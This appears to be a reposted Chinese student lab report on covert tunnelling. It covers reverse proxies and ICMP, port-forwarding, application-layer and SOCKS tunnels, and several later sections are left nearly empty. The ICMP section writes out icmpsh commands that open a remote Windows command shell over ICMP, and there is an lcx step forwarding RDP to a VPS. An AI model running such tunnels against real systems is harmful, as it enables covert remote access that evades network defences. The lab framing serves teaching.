构建隐藏通信隧道

实验目的与要求

实验目的

通过实验能够描述并运用网络层、传输层、应用层和SOCKS代理隧道技术。

实验要求

(1)理解反向代理,能够描述反向代理;

(2)理解网络层隧道,能够描述并运用网络层隧道技术;

(3)理解传输层隧道,能够描述并运用传输层隧道技术;

(4)理解应用层隧道,能够描述并运用应用层隧道技术;

(5)理解SOCKS代理,能够描述并运用SOCKS代理。

实验原理与内容

实验原理

(1)简述反向代理原理

反向代理是一种网络技术,用于在服务器端接收客户端请求,并将这些请求转发到内部网络的其他服务器上。其原理如下:

客户端发送请求:客户端向反向代理服务器发送请求,这个请求可能是访问网站、下载文件或执行其他网络操作。

反向代理接收请求:反向代理服务器接收到客户端的请求。

请求转发:反向代理服务器根据配置的规则,将请求转发到内部网络的一个或多个后端服务器上。

后端服务器处理请求:后端服务器接收到请求后,执行相应的操作,比如处理网页请求、生成动态内容、提供文件下载等。

响应返回:后端服务器生成响应,并将响应发送给反向代理服务器。

反向代理返回响应:反向代理服务器接收到后端服务器的响应后,将其发送回客户端。

反向代理的主要作用是隐藏了真实的后端服务器,客户端只与反向代理通信,无法直接访问后端服务器。这提供了安全性和负载均衡的优势。在安全方面,反向代理可以防止直接暴露后端服务器的 IP 地址和其他敏感信息,从而减少攻击风险。在负载均衡方面,反向代理可以根据负载情况将请求分发到多个后端服务器上,以提高性能和可靠性

实验内容

  1. 通过实例描述网络层隧道技术
  2. 通过实例描述传输层隧道技术
  3. 通过实例描述应用层隧道技术
  4. 通过实例描述SOCKS代理

实验过程与结果

  1. 通过实例描述网络层隧道技术

第一步首先在kali上安装impacket

在kali安装搭建icmpsh,并使用sysctl -w net.ipv4.icmp_echo_ignore_all=1

在icmpsh文件下使用./icmpsh_m.py 2.2.2.10 2.2.2.111,然后转到win7

然后查看本机ip,进入icmpsh下使用icmpsh.exe -t 2.2.2.10 -d 500 -b 30 -s 128转回kali查看

发现在kali终端已经进入win7cmd,然后输入whoami按图示来操作可获得win7IP信息

通过实例描述传输层隧道技术

在kali安装lcx_vuln.cn安装完成以后使用以下命令进行授权

端口映射

在目标机器上执行如下命令,将目标机器3389端口的所有数据转发到公网VPS3333端口上。

在kali终端输入rdesktop 2.2.2.10:2222

通过实例描述应用层隧道技术

重启ssh

观察端口是否打开

通过实例描述SOCKS代理

猜你喜欢

转载自blog.csdn.net/weixin_59151049/article/details/142941224